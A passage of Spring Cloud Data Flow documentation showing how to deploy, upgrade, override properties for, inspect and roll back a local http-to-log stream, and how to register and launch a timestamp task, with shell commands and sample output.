have stream applications, you can create a stream. To do so, use the following `stream create` command to create a stream with a `http` source and a `log` sink and deploy it:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n====\n\nNOTE: You need to wait a little while, until the apps are actually deployed successfully, before posting data.\nYou can look in the log file of the Skipper server for the location of the log files for the `http` and `log` applications.\nYou can use the `tail` command on the log file for each application to verify that the application has started.\n\nOnce the stream has started, you can post some data, as shown in the following example:\n\n====\n[source,bash]\n----\ndataflow:>http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\n====\n\nNow you should check to see if `hello world` ended up in log files for the `log` application.\nThe location of the log file for the `log` application appears in the Data Flow server's log.\n\nNOTE: When deploying locally, each app (and each app instance, in case of `count > 1`) gets a dynamically assigned `server.port`, unless you explicitly assign one with `--server.port=x`.\nIn both cases, this setting is propagated as a configuration property that overrides any lower-level setting that you may have used (for example, in `application.yml` files).\n\nThe following sections show how to update and roll back streams by using the Local Data Flow server and Skipper.\nIf you run the Unix `jps` command, you can see the two Java processes running, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n12643 log-sink-rabbit-1.1.0.RELEASE.jar\n12645 http-source-rabbit-1.2.0.RELEASE.jar\n----\n====\n\n[[getting-started-local-spring-cloud-dataflow-streams-upgrading]]\n==== Upgrading\n\nBefore we start upgrading the log-sink version to 1.2.0.RELEASE, we have to register that version in the app registry.\nThe following command does so:\n\n====\n[source,bash]\n----\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nSince we are using the local server, we need to set the port to a different value (9002) than the currently running log sink's value of 9000 to avoid a conflict.\nWhile we are at it, we update the log level to `ERROR`.\nTo do so, we create a YAML file, named `local-log-update.yml`, with the following contents:\n\n====\n[source,yml]\n----\nversion:\n log: 1.2.0.RELEASE\napp:\n log:\n server.port: 9002\n log.level: ERROR\n----\n====\n\nNow we can update the stream, as follows:\n\n====\n[source,bash]\n----\ndataflow:> stream update --name httptest --propertiesFile \/home\/mpollack\/local-log-update.yml\nUpdate request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is version 1.2.0.RELEASE, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n22031 log-sink-rabbit-1.1.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file of the Skipper server.\nTo do so, use the following commands (note that the directory names may not exactly match this example, because the numeric prefix changes):\n\n====\n[source,bash]\n----\ncd \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 12591 --- [ StateUpdate-1] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v2 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v2 to be healthy.\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v2 has been DEPLOYED\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v2 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world upgraded\"\n----\n====\n\nThe log message is now at the error level, as shown in the following example:\n\n====\n[source,bash]\n----\nERROR 22311 --- [http.httptest-1] log-sink : hello world upgraded\n----\n====\n\nIf you query the `\/info` endpoint of the application, you can also see that it is at version `1.2.0.RELEASE`, as shown in the following example:\n\n====\n[source,bash]\n----\n$ curl http:\/\/localhost:9002\/info\n{\"app\":{\"description\":\"Spring Cloud Stream Log Sink Rabbit Binder Application\",\"name\":\"log-sink-rabbit\",\"version\":\"1.2.0.RELEASE\"}}\n----\n====\n\n===== Forcing the Upgrade of a Stream\n\nWhen upgrading a stream, you can use the `--force` option to deploy new instances of currently deployed applications even if no application or deployment properties have changed.\nThis behavior is needed when configuration information is obtained by the application itself at startup time -- for example, from Spring Cloud Config Server.\nYou can specify which applications to force upgrade by using the `--app-names` option.\nIf you do not specify any application names, all the applications are force upgraded.\nYou can specify the `--force` and `--app-names` options together with `--properties` or `--propertiesFile` the options.\n\n===== Overriding Properties During Stream Update\n\nThe properties that are passed during stream update are added on top of the existing properties for the same stream.\n\nFor instance, the `ticktock` stream is deployed without any explicit properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name ticktock --definition \"time | log --name=mylogger\"\nCreated new stream 'ticktock'\n\ndataflow:>stream deploy --name ticktock\nDeployment request has been sent for stream 'ticktock'\n----\n====\n\nYou can view the manifest for the `ticktock` stream by using the `stream manifest` command, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n====\n\nIn the second update, we try to add a new property for a `log` application called `foo2=bar2`, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo2=bar2\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" \/\/ <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n\ndataflow:>stream list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Stream Name\u2502 Stream Definition \u2502 Status \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551ticktock \u2502time | log --log.name=mylogger --foo2=bar2\u2502The stream has been successfully deployed\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n----\n\n<1> Property `foo2=bar2` is applied for the `log` application.\n====\n\nNow, when we add another property `foo3=bar3` to the `log` application, this new property is added on top of the existing properties for the stream `ticktock`. The following example shows the command to do so and the result:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar3\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar3\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3=bar3` is added along with the existing `foo2=bar2` for the `log` application.\n====\n\nWe can still override the existing properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar4\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar4\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3` is replaced with the new value` bar4` and the existing property `foo2=bar2` remains.\n====\n\n===== Stream History\n\nYou can view the history of a stream by running the `stream history` command, as shown (with its output), in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502 Last updated \u2502 Status \u2502Package Name\u2502Package Version\u2502 Description \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25512 \u2502Mon Nov 27 22:41:16 EST 2017\u2502DEPLOYED\u2502httptest \u25021.0.0 \u2502Upgrade complete\u2551\n\u25511 \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\n===== Stream Manifest\n\nThe manifest is a YAML document that represents the final state of what was deployed to the platform.\nYou can view the manifest for any stream version by using the `stream manifest --name <name-of-stream> --releaseVersion <optional-version>` command.\nIf the `--releaseVersion` is not specified, the manifest for the last version is returned.\nThe following listing shows a typical `stream manifest` command and its output:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name httptest\n\n---\n# Source: log.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: log\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: log\n spring.cloud.stream.metrics.key: httptest.log.${spring.cloud.application.guid}\n spring.cloud.stream.bindings.input.group: httptest\n spring.cloud.stream.metrics.properties: spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: sink\n spring.cloud.stream.bindings.input.destination: httptest.http\n deploymentProperties:\n spring.cloud.deployer.indexed: true\n spring.cloud.deployer.group: httptest\n spring.cloud.deployer.count: 1\n\n---\n# Source: http.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: http\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: http\n spring.cloud.stream.metrics.key: httptest.http.${spring.cloud.application.guid}\n spring.cloud.stream.bindings.output.producer.requiredGroups: httptest\n spring.cloud.stream.metrics.properties: spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n server.port: 9000\n spring.cloud.stream.bindings.output.destination: httptest.http\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: source\n deploymentProperties:\n spring.cloud.deployer.group: httptest\n----\n====\n\nThe majority of the deployment and application properties were set by Data Flow in order to enable the applications to talk to each other and send application metrics with identifying labels.\n\nIf you compare this YAML document to the one for `--releaseVersion=1`, you can see the difference in the log application version.\n\n[[getting-started-local-streams-rollback]]\n==== Rolling Back\n\nTo go back to the previous version of the stream, you can use the `stream rollback` command, as shown (with its output) in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream rollback --name httptest\nRollback request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is back to 1.1.0.RELEASE.\nThe `http` source process remains unchanged.\nThe following listing shows the `jps` command and typical output:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n23939 log-sink-rabbit-1.1.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file for the skipper server, by using the following commands:\n\n====\n[source,bash]\n----\ncd \/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 21487 --- [ StateUpdate-2] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v3 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v3 to be healthy.\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v3 has been DEPLOYED\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v3 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world upgraded\"\n----\n====\n\nThe log message in the log sink is now back at the info error level, as shown in the following example:\n\n====\n[source,bash]\n----\nINFO 23939 --- [http.httptest-1] log-sink : hello world rollback\n----\n====\n\nThe `history` command now shows that the third version of the stream has been deployed, as shown (with its output) in the following listing:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502 Last updated \u2502 Status \u2502Package Name\u2502Package Version\u2502 Description \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25513 \u2502Mon Nov 27 23:01:13 EST 2017\u2502DEPLOYED\u2502httptest \u25021.0.0 \u2502Upgrade complete\u2551\n\u25512 \u2502Mon Nov 27 22:41:16 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u25511 \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nIf you look at the manifest for version 3, you can see that it shows version 1.1.0.RELEASE for the log sink.\n\n\n\n=== Deploying Tasks\n\nThis section shows how to register a task, create a task definition, and then launch the task.\nWe then also review information about the task executions.\n\nNOTE: Launching Spring Cloud Task applications does not use delegation to Skipper, since they are short-lived applications. Tasks are always deployed directly thorugh the Data Flow Server.\n\n. Register a Task App\n+\nBy default, the application registry is empty.\nAs an example, we register one task application, `timestamp`, which simply prints the current time to the log.\nThe following command registers the timestamp application:\n+\n====\n[source,bash]\n----\ndataflow:>app register --name timestamp --type task --uri maven:\/\/org.springframework.cloud.task.app:timestamp-task:1.3.0.RELEASE\nSuccessfully registered application 'task:timestamp'\n----\n====\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n\n. Create a Task Definition\n+\nYou can use the `task create` command to create a task definition that uses the previously registered `timestamp` application.\nIn the following example, no additional properties are used to configure the `timestamp` application:\n+\n====\n[source,bash]\n----\ndataflow:> task create --name printTimeStamp --definition \"timestamp\"\n----\n====\n\n. Launch a Task\n+\nThe launching of task definitions is done through the shell's `task launch` command, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:> task launch printTimeStamp\n----\n====\n+\nYou should check to see if the a timestamp ended up in the log file for the timestamp task.\nThe location of the log file for the task application appears in the Data Flow server\u2019s log.\nYou should see a log entry similar to the following:\n+\n====\n[source,bash]\n----\nTimestampTaskConfiguration$TimestampTask : 2018-02-28 16:42:21.051\n----\n====\n\n. Review task execution\n+\nYou can obtain information about the task execution by running the `task execution list` command, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution 